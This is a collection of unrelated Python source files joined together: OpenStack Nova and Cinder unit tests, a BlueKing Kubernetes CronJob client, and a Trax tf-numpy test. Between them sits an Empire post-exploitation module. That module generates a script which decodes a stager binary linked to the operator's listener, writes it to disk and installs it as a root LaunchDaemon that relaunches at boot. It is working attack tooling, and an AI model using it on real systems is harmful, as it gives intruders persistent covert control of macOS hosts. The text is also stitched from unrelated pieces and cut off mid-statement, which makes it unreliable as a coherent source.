                # we end up with a non-deterministic ordering, we'd loop
                # forever.
                break
            insts.extend(batch)
            page += 1
            if page > len(self.instances) * 2:
                # Do this sanity check in case we introduce (or find)
                # another repeating page bug like #1721791. Without this
                # we loop until timeout, which is less obvious.
                raise Exception('Infinite paging loop')

        # We should have requested exactly (or one more unlimited) pages
        self.assertIn(page, (pages, pages + 1))

        # Make sure the full set matches what we know to be true
        found = [x[sort_by] for x in insts]
        had = [x[sort_by] for x in self.instances]

        if sort_by in ('launched_at', 'created_at'):
            # We're comparing objects and database entries, so we need to
            # squash the tzinfo of the object ones so we can compare
            had = [x.replace(tzinfo=None) for x in had]

        self.assertEqual(len(had), len(found))
        if sort_dir == 'asc':
            self.assertEqual(sorted(had), found)
        else:
            self.assertEqual(list(reversed(sorted(had))), found)

    def test_get_sorted_with_limit_marker_stable(self):
        """Test sorted by hostname.

        This will be a stable sort that won't change on each run.
        """
        self._test_get_sorted_with_limit_marker(sort_by='hostname')

    def test_get_sorted_with_limit_marker_stable_reverse(self):
        """Test sorted by hostname.

        This will be a stable sort that won't change on each run.
        """
        self._test_get_sorted_with_limit_marker(sort_by='hostname',
                                                sort_dir='desc')

    def test_get_sorted_with_limit_marker_stable_different_pages(self):
        """Test sorted by hostname with different page sizes.

        Just do the above with page seams in different places.
        """
        self._test_get_sorted_with_limit_marker(sort_by='hostname',
                                                pages=3, pagesize=1)

    def test_get_sorted_with_limit_marker_stable_different_pages_reverse(
            self):
        """Test sorted by hostname with different page sizes.

        Just do the above with page seams in different places.
        """
        self._test_get_sorted_with_limit_marker(sort_by='hostname',
                                                pages=3, pagesize=1,
                                                sort_dir='desc')

    def test_get_sorted_with_limit_marker_random(self):
        """Test sorted by uuid.

        This will not be stable and the actual ordering will depend on
        uuid generation and thus be different on each run. Do this in
        addition to the stable sort above to keep us honest.
        """
        self._test_get_sorted_with_limit_marker(sort_by='uuid')

    def test_get_sorted_with_limit_marker_random_different_pages(self):
        """Test sorted by uuid with different page sizes.

        Just do the above with page seams in different places.
        """
        self._test_get_sorted_with_limit_marker(sort_by='uuid',
                                                pages=3, pagesize=2)

    def test_get_sorted_with_limit_marker_datetime(self):
        """Test sorted by launched_at.

        This tests that we can do all of this, but with datetime fields.
        """
        self._test_get_sorted_with_limit_marker(sort_by='launched_at')

    def test_get_sorted_with_limit_marker_datetime_same(self):
        """Test sorted by created_at.

        This tests that we can do all of this, but with datetime fields
        that are identical.
        """
        self._test_get_sorted_with_limit_marker(sort_by='created_at')

    def test_get_sorted_with_deleted_marker(self):
        marker = self.instances[1]['uuid']
        before = list(instance_list.get_instances_sorted(
            self.context, {}, None, marker, [], None, None)[1])
        db.instance_destroy(self.context, marker)
        after = list(instance_list.get_instances_sorted(
            self.context, {}, None, marker, [], None, None)[1])
        self.assertEqual(before, after)

    def test_get_sorted_with_invalid_marker(self):
        self.assertRaises(exception.MarkerNotFound,
                          list,
                          instance_list.get_instances_sorted(
                              self.context, {}, None, 'not-a-marker', [],
                              None, None)[1])

    def test_get_sorted_with_purged_instance(self):
        """Test that we handle a mapped but purged instance."""
        im = objects.InstanceMapping(self.context,
                                     instance_uuid=uuids.missing,
                                     project_id=self.context.project_id,
                                     user_id=self.context.user_id,
                                     cell=self.cells[0])
        im.create()
        self.assertRaises(exception.MarkerNotFound,
                          list,
                          instance_list.get_instances_sorted(
                              self.context, {}, None, uuids.missing, [],
                              None, None)[1])

    def _test_get_paginated_with_filter(self, filters):
        found_uuids = []
        marker = None
        while True:
            # Query for those instances, sorted by a different key in
            # pages of one until we've consumed them all
            batch = list(instance_list.get_instances_sorted(
                self.context, filters, 1, marker, [], ['hostname'],
                ['asc'])[1])
            if not batch:
                break
            found_uuids.extend([x['uuid'] for x in batch])
            marker = found_uuids[-1]
        return found_uuids

    def test_get_paginated_with_uuid_filter(self):
        """Test getting pages with uuid filters.

        This runs through the results of a uuid-filtered query in pages of
        length one to ensure that we land on markers that are filtered out
        of the query and are not accidentally returned.
        """
        # Pick a set of the instances by uuid, when sorted by uuid
        all_uuids = [x['uuid'] for x in self.instances]
        filters = {'uuid': sorted(all_uuids)[:7]}
        found_uuids = self._test_get_paginated_with_filter(filters)

        # Make sure we found all (and only) the instances we asked for
        self.assertEqual(set(found_uuids), set(filters['uuid']))
        self.assertEqual(7, len(found_uuids))

    def test_get_paginated_with_other_filter(self):
        """Test getting pages with another filter.

        This runs through the results of a filtered query in pages of
        length one to ensure we land on markers that are filtered out of
        the query and are not accidentally returned.
        """
        expected = [inst['uuid'] for inst in self.instances
                    if inst['instance_type_id'] == 1]
        filters = {'instance_type_id': 1}
        found_uuids = self._test_get_paginated_with_filter(filters)
        self.assertEqual(set(expected), set(found_uuids))

    def test_get_paginated_with_uuid_and_other_filter(self):
        """Test getting pages with a uuid and other type of filter.

        We do this to make sure that we still find (but exclude) the
        marker even if one of the other filters would have included it.
        """
        # Pick a set of the instances by uuid, when sorted by uuid
        all_uuids = [x['uuid'] for x in self.instances]
        filters = {'uuid': sorted(all_uuids)[:7],
                   'user_id': 'fake'}
        found_uuids = self._test_get_paginated_with_filter(filters)

        # Make sure we found all (and only) the instances we asked for
        self.assertEqual(set(found_uuids), set(filters['uuid']))
        self.assertEqual(7, len(found_uuids))

    def test_get_sorted_with_faults(self):
        """Make sure we get faults when we ask for them."""
        insts = list(instance_list.get_instances_sorted(
            self.context, {}, None, None, ['fault'], ['hostname'],
            ['asc'])[1])

        # Two of the instances in each cell have faults (0th and 2nd)
        expected_faults = self.NUMBER_OF_CELLS * 2
        expected_no_fault = len(self.instances) - expected_faults
        faults = [inst['fault'] for inst in insts]
        self.assertEqual(expected_no_fault, faults.count(None))

    def test_get_sorted_paginated_with_faults(self):
        """Get pages of one with faults.

        Do this specifically so we make sure we land on faulted marker
        instances to ensure we don't omit theirs.
        """
        insts = []
        while True:
            if insts:
                marker = insts[-1]['uuid']
            else:
                marker = None
            batch = list(instance_list.get_instances_sorted(
                self.context, {}, 1, marker, ['fault'], ['hostname'],
                ['asc'])[1])
            if not batch:
                break
            insts.extend(batch)

        self.assertEqual(len(self.instances), len(insts))
        # Two of the instances in each cell have faults (0th and 2nd)
        expected_faults = self.NUMBER_OF_CELLS * 2
        expected_no_fault = len(self.instances) - expected_faults
        faults = [inst['fault'] for inst in insts]
        self.assertEqual(expected_no_fault, faults.count(None))

    def test_instance_list_minimal_cells(self):
        """Get a list of instances with a subset of cell mappings."""
        last_cell = self.cells[-1]
        with context.target_cell(self.context, last_cell) as cctxt:
            last_cell_instances = db.instance_get_all(cctxt)
            last_cell_uuids = [inst['uuid']
                               for inst in last_cell_instances]

        instances = list(instance_list.get_instances_sorted(
            self.context, {}, None, None, [], ['uuid'], ['asc'],
            cell_mappings=self.cells[:-1])[1])
        found_uuids = [inst['hostname'] for inst in instances]
        had_uuids = [inst['hostname'] for inst in self.instances
                     if inst['uuid'] not in last_cell_uuids]
        self.assertEqual(sorted(had_uuids), sorted(found_uuids))


class TestInstanceListObjects(test.TestCase):
    def setUp(self):
        super(TestInstanceListObjects, self).setUp()

        self.context = context.RequestContext('fake', 'fake')
        self.num_instances = 3
        self.instances = []

        start = datetime.datetime(1985, 10, 25, 1, 21, 0)
        dt = start
        spread = datetime.timedelta(minutes=10)

        cells = objects.CellMappingList.get_all(self.context)
        # Create three instances in each of the real cells. Leave the
        # first cell empty to make sure we don't break with an empty one.
        for cell in cells[1:]:
            for i in range(0, self.num_instances):
                with context.target_cell(self.context, cell) as cctx:
                    inst = objects.Instance(
                        context=cctx,
                        project_id=self.context.project_id,
                        user_id=self.context.user_id,
                        created_at=start,
                        launched_at=dt,
                        instance_type_id=i,
                        hostname='%s-inst%i' % (cell.name, i))
                    inst.create()
                    if i % 2 == 0:
                        # Make some faults for this instance
                        for n in range(0, i + 1):
                            msg = 'fault%i-%s' % (n, inst.hostname)
                            f = objects.InstanceFault(
                                context=cctx,
                                instance_uuid=inst.uuid,
                                code=i,
                                message=msg,
                                details='fake',
                                host='fakehost')
                            f.create()
                self.instances.append(inst)
                im = objects.InstanceMapping(
                    context=self.context,
                    project_id=inst.project_id,
                    user_id=inst.user_id,
                    instance_uuid=inst.uuid,
                    cell_mapping=cell)
                im.create()
                dt += spread

    def test_get_instance_objects_sorted(self):
        filters = {}
        limit = None
        marker = None
        expected_attrs = []
        sort_keys = ['uuid']
        sort_dirs = ['asc']
        insts, down_cell_uuids = instance_list.get_instance_objects_sorted(
            self.context, filters, limit, marker, expected_attrs,
            sort_keys, sort_dirs)
        found_uuids = [x.uuid for x in insts]
        had_uuids = sorted([x['uuid'] for x in self.instances])
        self.assertEqual(had_uuids, found_uuids)

        # Make sure none of the instances have fault set
        self.assertEqual(0, len([inst for inst in insts
                                 if 'fault' in inst]))

    def test_get_instance_objects_sorted_with_fault(self):
        filters = {}
        limit = None
        marker = None
        expected_attrs = ['fault']
        sort_keys = ['uuid']
        sort_dirs = ['asc']
        insts, down_cell_uuids = instance_list.get_instance_objects_sorted(
            self.context, filters, limit, marker, expected_attrs,
            sort_keys, sort_dirs)
        found_uuids = [x.uuid for x in insts]
        had_uuids = sorted([x['uuid'] for x in self.instances])
        self.assertEqual(had_uuids, found_uuids)

        # They should all have fault set, but only some have
        # actual faults
        self.assertEqual(2, len([inst for inst in insts
                                 if inst.fault]))

    def test_get_instance_objects_sorted_paged(self):
        """Query a full first page and ensure an empty second one.

        This uses created_at which is enforced to be the same across each
        instance by setUp(). This will help make sure we still have a
        stable ordering, even when we only claim to care about created_at.
        """
        instp1, down_cell_uuids = instance_list.get_instance_objects_sorted(
            self.context, {}, None, None, [],
            ['created_at'], ['asc'])
        self.assertEqual(len(self.instances), len(instp1))
        instp2, down_cell_uuids = instance_list.get_instance_objects_sorted(
            self.context, {}, None, instp1[-1]['uuid'], [],
            ['created_at'], ['asc'])
        self.assertEqual(0, len(instp2))
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2021 TH<NAME>, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://opensource.org/licenses/MIT

Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from backend.container_service.clusters.base.models import CtxCluster
from backend.resources.constants import DEFAULT_CRON_JOB_API_VERSION, K8sResourceKind
from backend.resources.resource import ResourceClient
from backend.resources.workloads.cronjob.formatter import CronJobFormatter


class CronJob(ResourceClient):
    """Resource client for Kubernetes CronJob objects."""

    # Resource kind and result formatter used by the base client.
    kind = K8sResourceKind.CronJob.value
    formatter = CronJobFormatter()

    def __init__(self, ctx_cluster: CtxCluster):
        # Pin the API version so all CronJob operations hit the same group.
        super().__init__(
            ctx_cluster=ctx_cluster,
            api_version=DEFAULT_CRON_JOB_API_VERSION,
        )
# coding=utf-8
# Copyright 2021 The Trax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""Tests different ways to use the public tf-numpy module."""

import numpy as onp
import tensorflow as tf

import tensorflow.experimental.numpy as np1
from tensorflow.experimental import numpy as np2  # pylint: disable=reimported

# Third access path: attribute lookup on the tf module itself.
np3 = tf.experimental.numpy


class PublicSymbolTest(tf.test.TestCase):

  def testSimple(self):
    a, b = 0.1, 0.2
    expected = onp.add(a, b)
    # All three import styles must expose the same, working `add`.
    for op in (np1.add, np2.add, np3.add):
      self.assertAllClose(expected, op(a, b))


if __name__ == "__main__":
  tf.compat.v1.enable_eager_execution()
  tf.test.main()
import base64


class Module:
    """Empire module that installs a persistent macOS LaunchDaemon."""

    def __init__(self, mainMenu, params=None):
        """Set up module metadata and runtime-settable options.

        ``params`` is an optional sequence of ``[Name, Value]`` pairs used
        to pre-populate ``self.options`` (e.g. from the command line).
        The default is ``None`` rather than a mutable ``[]`` so the list
        is never shared between instances; behavior is otherwise unchanged.
        """
        # metadata info about the module, not modified during runtime
        self.info = {
            # name for the module that will appear in module menus
            'Name': 'LaunchDaemon',

            # list of one or more authors for the module
            'Author': ['@xorrior'],

            # more verbose multi-line description of the module
            'Description': ('Installs an Empire launchDaemon.'),

            # True if the module needs to run in the background
            'Background': False,

            # File extension to save the file as
            'OutputExtension': None,

            # if the module needs administrative privileges
            'NeedsAdmin': True,

            # True if the method doesn't touch disk/is reasonably opsec safe
            'OpsecSafe': False,

            # the module language
            'Language': 'python',

            # the minimum language version needed
            'MinLanguageVersion': '2.6',

            # list of any references/other comments
            'Comments': []
        }

        # any options needed by the module, settable during runtime
        self.options = {
            # format:
            #   value_name : {description, required, default_value}
            'Agent': {
                # The 'Agent' option is the only one that MUST be in a module
                'Description': 'Agent to execute module on.',
                'Required': True,
                'Value': ''
            },
            'Listener': {
                'Description': 'Listener to use.',
                'Required': True,
                'Value': ''
            },
            'SafeChecks': {
                'Description': 'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.',
                'Required': True,
                'Value': 'True'
            },
            'UserAgent': {
                'Description': 'User-agent string to use for the staging request (default, none, or other).',
                'Required': False,
                'Value': 'default'
            },
            'DaemonName': {
                'Description': 'Name of the Launch Daemon to install. Name will also be used for the plist file.',
                'Required': True,
                'Value': 'com.proxy.initialize'
            },
            'DaemonLocation': {
                'Description': 'The full path of where the Empire launch daemon should be located.',
                'Required': True,
                'Value': ''
            }
        }

        # save off a copy of the mainMenu object to access external
        # functionality like listeners/agent handlers/etc.
        self.mainMenu = mainMenu

        # During instantiation, any settable option parameters are passed
        # as an object set to the module and the options dictionary is
        # automatically set. This is mostly in case options are passed on
        # the command line.
        if params:
            for param in params:
                # parameter format is [Name, Value]
                option, value = param
                if option in self.options:
                    self.options[option]['Value'] = value

    def generate(self, obfuscate=False, obfuscationCommand=""):
        """Build the Python installer script for the launch daemon.

        Returns a script (string) that, when run on the target, writes the
        Mach-O payload to DaemonLocation, drops a plist into
        /Library/LaunchDaemons and loads it via launchctl.
        """
        daemonName = self.options['DaemonName']['Value']
        programname = self.options['DaemonLocation']['Value']
        plistfilename = "%s.plist" % daemonName
        listenerName = self.options['Listener']['Value']
        userAgent = self.options['UserAgent']['Value']
        safeChecks = self.options['SafeChecks']['Value']

        launcher = self.mainMenu.stagers.generate_launcher(
            listenerName, language='python', userAgent=userAgent,
            safeChecks=safeChecks)
        # NOTE(review): str.strip() removes a *set of characters*, not a
        # substring — .strip('echo') strips any leading/trailing e/c/h/o
        # characters, and .strip(' | python &') strips those characters
        # too. This matches historical behavior for the launcher format it
        # expects, so it is preserved as-is; confirm before changing.
        launcher = launcher.strip('echo').strip(' | python &').strip("\"")
        machoBytes = self.mainMenu.stagers.generate_macho(
            launcherCode=launcher)
        # NOTE(review): under Python 3, b64encode returns bytes, which
        # would render as "b'...'" in the %s interpolation below — this
        # module appears to target Python 2 (see MinLanguageVersion and
        # the print statements in the generated script); verify before
        # porting.
        encBytes = base64.b64encode(machoBytes)

        plistSettings = """
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0">
<plist version="1.0">
<dict>
<key>Label</key>
<string>%s</string>
<key>ProgramArguments</key>
<array>
<string>%s</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>KeepAlive</key>
<true/>
</dict>
</plist>
""" % (daemonName, programname)

        script = """
import subprocess
import sys
import base64
import os

encBytes = "%s"
bytes = base64.b64decode(encBytes)
plist = \"\"\"
%s
\"\"\"
daemonPath = "%s"
if not os.path.exists(os.path.split(daemonPath)[0]):
    os.makedirs(os.path.split(daemonPath)[0])

e = open(daemonPath,'wb')
e.write(bytes)
e.close()
os.chmod(daemonPath, 0777)
f = open('/tmp/%s','w')
f.write(plist)
f.close()

process = subprocess.Popen('chmod 644 /tmp/%s', stdout=subprocess.PIPE, shell=True)
process.communicate()
process = subprocess.Popen('chown -R root /tmp/%s', stdout=subprocess.PIPE, shell=True)
process.communicate()
process = subprocess.Popen('chown :wheel /tmp/%s', stdout=subprocess.PIPE, shell=True)
process.communicate()
process = subprocess.Popen('mv /tmp/%s /Library/LaunchDaemons/%s', stdout=subprocess.PIPE, shell=True)
process.communicate()
process = subprocess.Popen('launchctl load /Library/LaunchDaemons/%s', stdout=subprocess.PIPE, shell=True)
process.communicate()

print "\\n[+] Persistence has been installed: /Library/LaunchDaemons/%s"
print "\\n[+] Empire daemon has been written to %s"
""" % (encBytes, plistSettings, programname, plistfilename,
       plistfilename, plistfilename, plistfilename, plistfilename,
       plistfilename, plistfilename, plistfilename, programname)

        return script
# Copyright 2011-2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests For Capacity Weigher."""

from datetime import datetime
from unittest import mock

import ddt

from cinder.common import constants
from cinder import context
from cinder.scheduler import weights
from cinder.tests.unit.scheduler import fakes
from cinder.tests.unit import test
from cinder.volume import volume_utils


@ddt.ddt
class CapacityWeigherTestCase(test.TestCase):
    """Unit tests for the scheduler CapacityWeigher.

    The weigher ranks backends by free capacity; a positive
    capacity_weight_multiplier spreads volumes (most free wins), a negative
    one stacks them (least free wins). Backends come from
    fakes.FakeHostManager (host1..host5).
    """

    def setUp(self):
        # Fresh fake host manager and weight handler for each test.
        super(CapacityWeigherTestCase, self).setUp()
        self.host_manager = fakes.FakeHostManager()
        self.weight_handler = weights.OrderedHostWeightHandler(
            'cinder.scheduler.weights')

    def _get_weighed_hosts(self, hosts, weight_properties=None):
        # Run CapacityWeigher over `hosts`; results are ordered best-first.
        if weight_properties is None:
            weight_properties = {'size': 1}
        return self.weight_handler.get_weighed_objects(
            [weights.capacity.CapacityWeigher],
            hosts,
            weight_properties)

    @mock.patch('cinder.db.sqlalchemy.api.service_get_all')
    def _get_all_backends(self, _mock_service_get_all, disabled=False):
        # Build backend states from the fake DB data and verify the host
        # manager queried the service list exactly once.
        ctxt = context.get_admin_context()
        fakes.mock_host_manager_db_calls(_mock_service_get_all,
                                         disabled=disabled)
        backend_states = self.host_manager.get_all_backend_states(ctxt)
        _mock_service_get_all.assert_called_once_with(
            ctxt,
            None,  # backend_match_level
            topic=constants.VOLUME_TOPIC, frozen=False, disabled=disabled)
        return backend_states

    # If thin and thin_provisioning_support are True,
    # use the following formula:
    # free = (total * host_state.max_over_subscription_ratio
    #        - host_state.provisioned_capacity_gb
    #        - math.floor(total * reserved))
    # Otherwise, use the following formula:
    # free = free_space - math.floor(total * reserved)
    @ddt.data(
        {'volume_type': {'extra_specs': {'provisioning:type': 'thin'}},
         'winner': 'host2'},
        {'volume_type': {'extra_specs': {'provisioning:type': 'thick'}},
         'winner': 'host1'},
        {'volume_type': {'extra_specs': {}},
         'winner': 'host2'},
        {'volume_type': {},
         'winner': 'host2'},
        {'volume_type': None,
         'winner': 'host2'},
    )
    @ddt.unpack
    def test_default_of_spreading_first(self, volume_type, winner):
        """Default (positive) multiplier: most-free backend wins."""
        backend_info_list = self._get_all_backends()

        # Results for the 1st test
        # {'provisioning:type': 'thin'}:
        # host1: thin_provisioning_support = False
        #        free_capacity_gb=1024,
        #        free=1024-math.floor(1024*0.1)=922
        #        Norm=0.837837837838
        # host2: thin_provisioning_support = True
        #        free_capacity_gb=300,
        #        free=2048*1.5-1748-math.floor(2048*0.1)=1120
        #        Norm=1.0
        # host3: thin_provisioning_support = False
        #        free_capacity_gb=512, free=256-512*0=256
        #        Norm=0.292383292383
        # host4: thin_provisioning_support = True
        #        free_capacity_gb=200,
        #        free=2048*1.0-2047-math.floor(2048*0.05)=-101
        #        Norm=0.0
        # host5: free_capacity_gb=unknown free=-1
        #        Norm=0.0819000819001

        # so, host2 should win:
        weight_properties = {
            'size': 1,
            'volume_type': volume_type,
        }
        weighed_host = self._get_weighed_hosts(
            backend_info_list,
            weight_properties=weight_properties)[0]
        self.assertEqual(1.0, weighed_host.weight)
        self.assertEqual(winner,
                         volume_utils.extract_host(weighed_host.obj.host))

    @ddt.data(
        {'volume_type': {'extra_specs': {'provisioning:type': 'thin'}},
         'winner': 'host4'},
        {'volume_type': {'extra_specs': {'provisioning:type': 'thick'}},
         'winner': 'host2'},
        {'volume_type': {'extra_specs': {}},
         'winner': 'host4'},
        {'volume_type': {},
         'winner': 'host4'},
        {'volume_type': None,
         'winner': 'host4'},
    )
    @ddt.unpack
    def test_capacity_weight_multiplier1(self, volume_type, winner):
        """Negative multiplier inverts the ranking (stacking)."""
        self.flags(capacity_weight_multiplier=-1.0)
        backend_info_list = self._get_all_backends()

        # Results for the 1st test
        # {'provisioning:type': 'thin'}:
        # host1: thin_provisioning_support = False
        #        free_capacity_gb=1024,
        #        free=-(1024-math.floor(1024*0.1))=-922
        #        Norm=-0.00829542413701
        # host2: thin_provisioning_support = True
        #        free_capacity_gb=300,
        #        free=-(2048*1.5-1748-math.floor(2048*0.1))=-1120
        #        Norm=-0.00990099009901
        # host3: thin_provisioning_support = False
        #        free_capacity_gb=512, free=-(256-512*0)=-256
        #        Norm=-0.002894884083
        # host4: thin_provisioning_support = True
        #        free_capacity_gb=200,
        #        free=-(2048*1.0-2047-math.floor(2048*0.05))=101
        #        Norm=0.0
        # host5: free_capacity_gb=unknown free=-float('inf')
        #        Norm=-1.0

        # so, host4 should win:
        weight_properties = {
            'size': 1,
            'volume_type': volume_type,
        }
        weighed_host = self._get_weighed_hosts(
            backend_info_list,
            weight_properties=weight_properties)
        weighed_host = weighed_host[0]
        self.assertEqual(0.0, weighed_host.weight)
        self.assertEqual(winner,
                         volume_utils.extract_host(weighed_host.obj.host))

    @ddt.data(
        {'volume_type': {'extra_specs': {'provisioning:type': 'thin'}},
         'winner': 'host2'},
        {'volume_type': {'extra_specs': {'provisioning:type': 'thick'}},
         'winner': 'host1'},
        {'volume_type': {'extra_specs': {}},
         'winner': 'host2'},
        {'volume_type': {},
         'winner': 'host2'},
        {'volume_type': None,
         'winner': 'host2'},
    )
    @ddt.unpack
    def test_capacity_weight_multiplier2(self, volume_type, winner):
        """Multiplier > 1 scales the weights but keeps the ordering."""
        self.flags(capacity_weight_multiplier=2.0)
        backend_info_list = self._get_all_backends()

        # Results for the 1st test
        # {'provisioning:type': 'thin'}:
        # host1: thin_provisioning_support = False
        #        free_capacity_gb=1024,
        #        free=(1024-math.floor(1024*0.1))*2=1844
        #        Norm=1.67567567568
        # host2: thin_provisioning_support = True
        #        free_capacity_gb=300,
        #        free=(2048*1.5-1748-math.floor(2048*0.1))*2=2240
        #        Norm=2.0
        # host3: thin_provisioning_support = False
        #        free_capacity_gb=512, free=(256-512*0)*2=512
        #        Norm=0.584766584767
        # host4: thin_provisioning_support = True
        #        free_capacity_gb=200,
        #        free=(2048*1.0-2047-math.floor(2048*0.05))*2=-202
        #        Norm=0.0
        # host5: free_capacity_gb=unknown free=-2
        #        Norm=0.1638001638

        # so, host2 should win:
        weight_properties = {
            'size': 1,
            'volume_type': volume_type,
        }
        weighed_host = self._get_weighed_hosts(
            backend_info_list,
            weight_properties=weight_properties)[0]
        self.assertEqual(1.0 * 2, weighed_host.weight)
        self.assertEqual(winner,
                         volume_utils.extract_host(weighed_host.obj.host))

    def test_capacity_weight_no_unknown_or_infinite(self):
        """With no unknown/infinite backend, host2..host4 span [-1, 0]."""
        self.flags(capacity_weight_multiplier=-1.0)
        del self.host_manager.service_states['host5']
        backend_info_list = self._get_all_backends()

        # host1: thin_provisioning_support = False
        #        free_capacity_gb=1024,
        #        free=(1024-math.floor(1024*0.1))=-922
        #        Norm=-0.837837837838
        # host2: thin_provisioning_support = True
        #        free_capacity_gb=300,
        #        free=(2048*1.5-1748-math.floor(2048*0.1))=-1120
        #        Norm=-1.0
        # host3: thin_provisioning_support = False
        #        free_capacity_gb=512, free=(256-512*0)=-256
        #        Norm=-0.292383292383
        # host4: thin_provisioning_support = True
        #        free_capacity_gb=200,
        #        free=(2048*1.0-2047-math.floor(2048*0.05))=101
        #        Norm=0.0

        # so, host4 should win:
        weighed_hosts = self._get_weighed_hosts(backend_info_list)
        best_host = weighed_hosts[0]
        self.assertEqual(0.0, best_host.weight)
        self.assertEqual('host4',
                         volume_utils.extract_host(best_host.obj.host))
        # and host2 is the worst:
        worst_host = weighed_hosts[-1]
        self.assertEqual(-1.0, worst_host.weight)
        self.assertEqual('host2',
                         volume_utils.extract_host(worst_host.obj.host))

    def test_capacity_weight_free_unknown(self):
        """A backend reporting unknown free capacity ranks worst."""
        self.flags(capacity_weight_multiplier=-1.0)
        self.host_manager.service_states['host5'] = {
            'total_capacity_gb': 3000,
            'free_capacity_gb': 'unknown',
            'allocated_capacity_gb': 1548,
            'provisioned_capacity_gb': 1548,
            'max_over_subscription_ratio': 1.0,
            'thin_provisioning_support': True,
            'thick_provisioning_support': False,
            'reserved_percentage': 5,
            'timestamp': datetime.utcnow()}
        backend_info_list = self._get_all_backends()

        # host1: thin_provisioning_support = False
        #        free_capacity_gb=1024,
        #        free=(1024-math.floor(1024*0.1))=-922
        #        Norm= -0.00829542413701
        # host2: thin_provisioning_support = True
        #        free_capacity_gb=300,
        #        free=(2048*1.5-1748-math.floor(2048*0.1))=-1120
        #        Norm=-0.00990099009901
        # host3: thin_provisioning_support = False
        #        free_capacity_gb=512, free=(256-512*0)=-256
        #        Norm=-0.002894884083
        # host4: thin_provisioning_support = True
        #        free_capacity_gb=200,
        #        free=(2048*1.0-2047-math.floor(2048*0.05))=101
        #        Norm=0.0
        # host5: free_capacity_gb=unknown free=3000
        #        Norm=-1.0

        # so, host4 should win:
        weighed_hosts = self._get_weighed_hosts(backend_info_list)
        best_host = weighed_hosts[0]
        self.assertEqual(0.0, best_host.weight)
        self.assertEqual('host4',
                         volume_utils.extract_host(best_host.obj.host))
        # and host5 is the worst:
        worst_host = weighed_hosts[-1]
        self.assertEqual(-1.0, worst_host.weight)
        self.assertEqual('host5',
                         volume_utils.extract_host(worst_host.obj.host))

    def test_capacity_weight_cap_unknown(self):
        """A backend reporting unknown total capacity ranks worst."""
        self.flags(capacity_weight_multiplier=-1.0)
        self.host_manager.service_states['host5'] = {
            'total_capacity_gb': 'unknown',
            'free_capacity_gb': 3000,
            'allocated_capacity_gb': 1548,
            'provisioned_capacity_gb': 1548,
            'max_over_subscription_ratio': 1.0,
            'thin_provisioning_support': True,
            'thick_provisioning_support': False,
            'reserved_percentage': 5,
            'timestamp': datetime.utcnow()}
        backend_info_list = self._get_all_backends()

        # host1: thin_provisioning_support = False
        #        free_capacity_gb=1024,
        #        free=(1024-math.floor(1024*0.1))=-922
        #        Norm= -0.00829542413701
        # host2: thin_provisioning_support = True
        #        free_capacity_gb=300,
        #        free=(2048*1.5-1748-math.floor(2048*0.1))=-1120
        #        Norm=-0.00990099009901
        # host3: thin_provisioning_support = False
        #        free_capacity_gb=512, free=(256-512*0)=-256
        #        Norm=-0.002894884083
        # host4: thin_provisioning_support = True
        #        free_capacity_gb=200,
        #        free=(2048*1.0-2047-math.floor(2048*0.05))=101
        #        Norm=0.0
        # host5: free_capacity_gb=3000 free=unknown
        #        Norm=-1.0

        # so, host4 should win:
        weighed_hosts = self._get_weighed_hosts(backend_info_list)
        best_host = weighed_hosts[0]
        self.assertEqual(0.0, best_host.weight)
        self.assertEqual('host4',
                         volume_utils.extract_host(best_host.obj.host))
        # and host5 is the worst:
        worst_host = weighed_hosts[-1]
        self.assertEqual(-1.0, worst_host.weight)
        self.assertEqual('host5',
                         volume_utils.extract_host(worst_host.obj.host))

    def test_capacity_weight_free_infinite(self):
        """A backend reporting infinite free capacity ranks worst."""
        self.flags(capacity_weight_multiplier=-1.0)
        self.host_manager.service_states['host5'] = {
            'total_capacity_gb': 3000,
            'free_capacity_gb': 'infinite',
            'allocated_capacity_gb': 1548,
            'provisioned_capacity_gb': 1548,
            'max_over_subscription_ratio': 1.0,
            'thin_provisioning_support': True,
            'thick_provisioning_support': False,
            'reserved_percentage': 5,
            'timestamp': datetime.utcnow()}
        backend_info_list = self._get_all_backends()

        # host1: thin_provisioning_support = False
        #        free_capacity_gb=1024,
        #        free=(1024-math.floor(1024*0.1))=-922
        #        Norm= -0.00829542413701
        # host2: thin_provisioning_support = True
        #        free_capacity_gb=300,
        #        free=(2048*1.5-1748-math.floor(2048*0.1))=-1120
        #        Norm=-0.00990099009901
        # host3: thin_provisioning_support = False
        #        free_capacity_gb=512, free=(256-512*0)=-256
        #        Norm=-0.002894884083
        # host4: thin_provisioning_support = True
        #        free_capacity_gb=200,
        #        free=(2048*1.0-2047-math.floor(2048*0.05))=101
        #        Norm=0.0
        # host5: free_capacity_gb=infinite free=3000
        #        Norm=-1.0

        # so, host4 should win:
        weighed_hosts = self._get_weighed_hosts(backend_info_list)
        best_host = weighed_hosts[0]
        self.assertEqual(0.0, best_host.weight)
        self.assertEqual('host4',
                         volume_utils.extract_host(best_host.obj.host))
        # and host5 is the worst:
        worst_host = weighed_hosts[-1]
        self.assertEqual(-1.0, worst_host.weight)
        self.assertEqual('host5',
